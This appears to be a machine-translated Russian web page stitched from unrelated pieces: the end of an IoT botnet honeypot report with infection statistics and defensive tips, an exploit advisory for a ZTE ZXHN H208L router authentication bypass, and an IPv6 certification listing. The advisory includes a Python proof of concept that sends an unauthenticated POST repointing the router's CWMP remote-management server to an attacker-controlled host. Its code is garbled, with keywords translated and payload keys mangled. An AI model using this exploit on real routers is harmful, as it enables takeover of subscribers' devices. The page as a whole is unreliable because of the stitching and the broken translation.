RouterOS маршрутизатор 2 124 857
Домашний шлюз GPON 1 574 074
TL-WR841N 149 491
ZXHN h308N 79 045
TD-W8968 29 310
iGate GW040 GPON ONT 29 174
Итого 3 988 604

Также заслуживает внимания тот факт, что наши ловушки фиксировали не только атаки, исходящие от сетевого оборудования, классифицируемого как домашние устройства, но также и от оборудования корпоративного класса.

Еще более тревожным является тот факт, что среди всех IP-адресов, с которых исходили атаки, были некоторые, на которых размещались системы мониторинга и / или управления устройствами с корпоративными и безопасными ссылками, например:

  • Торговые точки в магазинах, ресторанах и на АЗС
  • Системы цифрового телевещания
  • Системы физической безопасности и контроля доступа
  • Приборы для мониторинга окружающей среды
  • Мониторинг на сейсмической станции в Бангкоке
  • Программируемые микроконтроллеры промышленного уровня
  • Системы энергоменеджмента

Мы не можем подтвердить, что именно эти типы устройств заражены.Однако мы наблюдали атаки на наши приманки, поступающие с IP-адресов, используемых этими устройствами, что означает, что по крайней мере одно или несколько устройств были заражены в сети, в которой они находятся.

География зараженных устройств

Если мы посмотрим на географическое распределение устройств с IP-адресами, которые мы видели атакующими наши приманки, мы увидим следующее:

Распределение IP-адресов атакующих устройств по странам. Январь-апрель 2017

Как мы уже упоминали выше, большинство зараженных устройств — это IP-камеры и видеорегистраторы.Многие из них широко распространены в Китае и Вьетнаме, а также в России, Бразилии, Турции и других странах.

Географическое распределение IP-адресов серверов, с которых на устройства загружается вредоносное ПО

На данный момент в 2017 году мы зафиксировали более 2 миллионов попыток взлома и более 11 000 уникальных IP-адресов, с которых было загружено вредоносное ПО для устройств Интернета вещей.

Вот разбивка этих IP-адресов по странам (первая десятка):

Страна Уникальные IP-адреса
Вьетнам 2136
Тайвань, провинция Китая 1356
Бразилия 1124
Турция 696
Корея, Республика 620
Индия 504
США 429
Российская Федерация 373
Китай 361
Румыния 283

Если ранжировать страны по количеству загрузок, картина меняется:

Страна Загрузки
Таиланд 580267
Гонконг 367524
Корея, Республика 339648
Нидерланды 271654
США 168224
Сейшельские острова 148322
Франция 68648
Гондурас 36988
Италия 20272
Соединенное Королевство 16279

Мы считаем, что это различие связано с наличием в некоторых из этих стран пуленепробиваемых серверов, а это означает, что вредоносное ПО гораздо быстрее и проще распространять, чем заражать устройства Интернета вещей.

Распределение активности атак по дням недели

При анализе активности ботнетов Интернета вещей мы смотрели на некоторые параметры их работы. Мы обнаружили, что в определенные дни недели наблюдаются всплески вредоносной активности (например, сканирование, парольные атаки и попытки подключения).

Распределение активности атак по дням недели. Апрель 2017

Похоже, понедельник — тяжелый день и для киберпреступников.Другого объяснения этому странному поведению найти не удалось.

Заключение

Растущее количество вредоносных программ, нацеленных на устройства Интернета вещей, и связанные с ними инциденты безопасности демонстрируют, насколько серьезна проблема безопасности интеллектуальных устройств. 2016 год показал, что эти угрозы не только концептуальны, но и вполне реальны. Существующая конкуренция на рынке DDoS-атак заставляет киберпреступников искать новые ресурсы для проведения все более мощных атак. Ботнет Mirai показал, что для этой цели можно использовать интеллектуальные устройства — уже сегодня во всем мире существуют миллиарды этих устройств, а к 2020 году их количество вырастет до 20-50 миллиардов устройств, согласно прогнозам аналитиков разных компаний.

В заключение мы предлагаем несколько рекомендаций, которые могут помочь защитить ваши устройства от заражения:

  1. Не разрешать доступ к вашему устройству из-за пределов вашей локальной сети, за исключением случаев, когда он вам нужен специально для использования вашего устройства;
  2. Отключите все сетевые сервисы, которые вам не нужны для использования вашего устройства;
  3. Если устройство имеет предварительно настроенный пароль или пароль по умолчанию и вы не можете его изменить, или предварительно настроенную учетную запись, которую вы не можете деактивировать, отключите сетевые службы, в которых они используются, или отключите доступ к ним из-за пределов локальной сети.
  4. Перед тем, как начать пользоваться устройством, измените пароль по умолчанию и установите новый надежный пароль;
  5. Регулярно обновляйте прошивку вашего устройства до последней версии (если такие обновления доступны).

Если вы последуете этим простым рекомендациям, вы защитите себя от значительной части существующих вредоносных программ Интернета вещей.

ZTE ZXHN h208L — Обход аутентификации (2)

  О программном обеспечении
==================

ZTE ZXHN h208L предоставляется своим абонентам некоторыми крупными греческими интернет-провайдерами.Подробная информация об уязвимости
=====================

Конфигурация CWMP доступна только через учетную запись администратора. CWMP - это протокол, широко используемый интернет-провайдерами по всему миру для удаленной инициализации и устранения неполадок оборудования своих абонентов. Однако редактирование конфигурации CWMP (а именно отправка запроса POST) не требует аутентификации пользователя.

Затронутые продукты
=================
Модель устройства: ZTE ZXHN h208L
Версия прошивки: ZXHN h208LV4.0,0d_ZRQ_GR4

Доказательство концепции
================

#! / usr / bin / python

запросы на импорт

acs_server = "http: // <сервер>: <порт>"
acs_user = "пользователь"
acs_pass = "пройти"

# Параметры запроса на подключение.  Когда делается запрос по следующему URL-адресу с использованием указанной комбинации пользователь / пароль,
# маршрутизатор снова подключится к серверу ACS.

conn_url = "/ tr069"
conn_port = "7564"
conn_user = "пользователь"
conn_pass = "пройти"

# Параметры периодической информации
активный = 1
интервал = 2000

payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server, 'CWMP_ACSUserName': acs_user, 'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': 'CWMP_ConnectionRequestPath': 'conn_url_Connection_Connection_ConnectionWMP_CWMP_Word_url,' CWMP_Request_Conquest_ConnectionWMPneport_url, 'CWMP_url_Request_Connection_ConnectionWMPneport_url,' CWMP_url_Request_Connection : conn_pass, 'CWMP_PeriodActive': активен, 'CWMP_PeriodInterval': интервал, 'CWMPLockFlag': '0'}

r = запросы.сообщение ("http://192.168.1.254/Forms/access_cwmp_1", данные = полезная нагрузка)

Влияние
======

Описанная уязвимость позволяет любому неаутентифицированному пользователю редактировать конфигурацию CWMP.  Эксплуатация может выполняться пользователями локальной сети или через Интернет, если маршрутизатор настроен на предоставление веб-интерфейса WAN. Также из-за того, что маршрутизатор не имеет защиты от CSRF, вредоносный код JS может быть развернут для использования уязвимости через вредоносную веб-страницу.

Строгость
========

Середина

Рекомендации
==========

https: // projectzero.gr / en / 2014/11 / zte-zxhn-h208l-аутентификация-обход /


График раскрытия информации
===================

27.10.2014 - Первая попытка связи как с продавцом, так и с интернет-провайдером
11.04.2014 - В ответе ZTE указано, что нужно связаться с интернет-провайдером.
11.03.2014 - Вторая попытка связаться с провайдером.
14.11.2014 - Нет ответа от интернет-провайдера. Публичное раскрытие

Контакты
===================
Домен: https://projectzero.gr
В соцсетях: twitter.com/projectzerolabs
Контакты: labs _at_ projectzero.гр
              

Коммутатор Ethernet Коммутатор Ethernet
Идентификатор логотипа Дата утверждения
Применение
Phase
Категория теста
Имя поставщика
Регион / Страна
Название
Продукт
Название
Продукт
Версия
Продукт
Наименование
(изменено)
Продукт
Версия
(модифицированная)
Классификация продукта
Соответствие
Тестовая версия
Совместимость
Тестовая версия
Идентификатор логотипа OEM-лицензиара
Обновление
02-C-002204 23. 04.2021 Фаза 2 Основные протоколы Beijing Anpro Information Technology Co., ООО CN Платформа для тестирования безопасности Xmaze IAST V4 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002203 21.04.2021 Фаза 2 Основные протоколы Новая компания h4C Technologies Co., Ltd. CN Устройство межсетевого экрана h4C SecPath F1000-AI Comware V7 Маршрутизатор 5.0,1 5.0.1 Новый
02-C-002201 17.04.2021 Фаза 2 Основные протоколы Secsmart Information Technology Co. , Ltd. CN Брандмауэр базы данных Secsmart V3.0 Secsmart DBF V3.0 Хост 5.0.1 5.0,1 Новый
02-C-002202 17.04.2021 Фаза 2 Основные протоколы Surfilter Network Technology Co., Ltd. CN Surfilter Система управления поведением в Интернете SURF V5.0 Маршрутизатор 5.0.1 5.0,1 Новый
02-C-002200 17.04.2021 Фаза 2 Основные протоколы Secsmart Information Technology Co., Ltd. CN Система предотвращения утечки данных Secsmart V3.0 Хост 5.0.1 5.0.1 Новый
02-C-002199 2021.04.14 Фаза 2 Основные протоколы Beijing Antiy Network Security Technology Co., ООО CN Антиблокировочная система изоляции и одностороннего импорта информации PTF-FGAP V3.0 Хост 5.0.1 5.0.1 Новый
02-C-002198 2021/04/11 Фаза 2 Основные протоколы Ruijie Networks Co., ООО CN: RG-S5760C-24GT8XS-X, RG-S5760C-24SFP / 8GT8XS-X, RG-S5760C-48GT4XS-X РГОС12.0 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002197 2021/04/11 Фаза 2 Основные протоколы Ruijie Networks Co., ООО CN: RG-S6120-20XS4VS2QXS, RG-S6120-48XS8CQ, RG-S6120-24XMG4XS4VS-UP-E РГОС12.0 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002196 2021/04/11 Фаза 2 Основные протоколы Future Systems, Inc. KR FOS, версия 4.0 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002195 2021/04/04 Фаза 2 Основные протоколы Пекинская Технологическая Компания Руифосан, Лтд. CN Комплексная система обработки данных DPS-3300 V1.0 Хост 5.0.1 5.0.1 Новый
02-C-002194 2021/04/01 Фаза 2 Основные протоколы BEIJING CERTIFICATE AUTHORITY Co., LTD CN ТСС V1 Хост 5.0,1 5.0.1 Новый
02-C-002193 2021/04/01 Фаза 2 Основные протоколы BEIJING CERTIFICATE AUTHORITY Co., LTD CN NAG V2 Хост 5.0.1 5.0.1 Новый
02-C-002192 26.03.2021 Фаза 2 Основные протоколы Allied Telesis JP SBx908 GEN2, SBx8112, SBx8106, серия x950, серия x930, серия x550, серия x530, серия x510, серия x320, серия x310, серия x230, серия x220, серия IX5, серия IE510, серия IE340, серия IE300, серия IE210, Коммутаторы серии IE200, XS916, GS980, GS970, GS900MX, серии FS980M 5.0,5–2,5 SBx908 GEN2, SBx8112, SBx8106, серия x950, серия x930, серия x550, серия x530, серия x510, серия x320, серия x310, серия x230, серия x220, серия IX5, серия IE510, серия IE340, серия IE300, серия IE210, IE200 Коммутаторы серии, серии XS916, серии GS980, серии GS970, серии GS900MX, серии FS980M 5.5.0-2.5 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002191 25.03.2021 Фаза 2 Основные протоколы Ruijie Networks Co., ООО CN RG-AP820-A РГОС 11.9 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002190 24.03.2021 Фаза 2 Основные протоколы Beijing RuizhiKangcheng Technology Co., Ltd CN WebEXP V2.0 Хост 5.0.1 5.0.1 Новый
02-C-002189 21.03.2021 Фаза 2 Основные протоколы Legendsec Information Technology (Пекин) Inc. CN Система сбора и анализа журналов Legendsec SecFox — LAS V5.0 Хост 5.0.1 5.0.1 Новый
02-C-002188 21.03.2021 Фаза 2 Основные протоколы AXGATE KR AOS, версия 2.1 Маршрутизатор 5.0,1 5.0.1 Новый
02-C-002187 17.03.2021 Фаза 2 Основные протоколы BEIJING CERTIFICATE AUTHORITY Co., LTD CN HSM V1 Хост 5.0.1 5.0.1 Новый
02-C-002186 17.03.2021 Фаза 2 Основные протоколы BEIJING CERTIFICATE AUTHORITY Co., ООО CN DSVS V2 Хост 5.0.1 5.0.1 Новый
02-C-002185 2021.03.11 Фаза 2 Основные протоколы China Mobile Group Device Co., Ltd. CN GPON ONU h4-1s HW: HWVer-A310, ПО: V32.AA1.01 Маршрутизатор 5.0.1 5.0.1 Новый
02-C-002184 2021.03.07 Фаза 2 Основные протоколы Hillstone Networks Inc. CN Система аудита и защиты баз данных Hillstone HS-DBA2000, версия 2.0 Хост 5.0,1 5.0.1 Новый
02-C-002183 28.02.2021 Фаза 2 Основные протоколы HUAWEI TECHNOLOGIES CO., LTD. CN Платформа аудита журналов Huawei HiSec LogAuditor 1500 V1 Хост 5.0.1 5.0,1 Новый
02-C-002181 27.02.2021 Фаза 2 Основные протоколы Dclingcloud (Пекин) Technology Co., Ltd. CN Система анализа производительности сети NetSenSor, версия 2.0 Хост 5.0.1 5.0.1 Новый
02-C-002182 27.02.2021 Фаза 2 Основные протоколы Ханчжоу Moresec Technology Co., ООО CN ПодробнееSec-D V3.0 Moresec-H V4.0 Хост 5.0.1 5.0.1 Новый
02-C-002180 27.02.2021 Фаза 2 Основные протоколы Trs Topwalk Информационные технологии CO.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *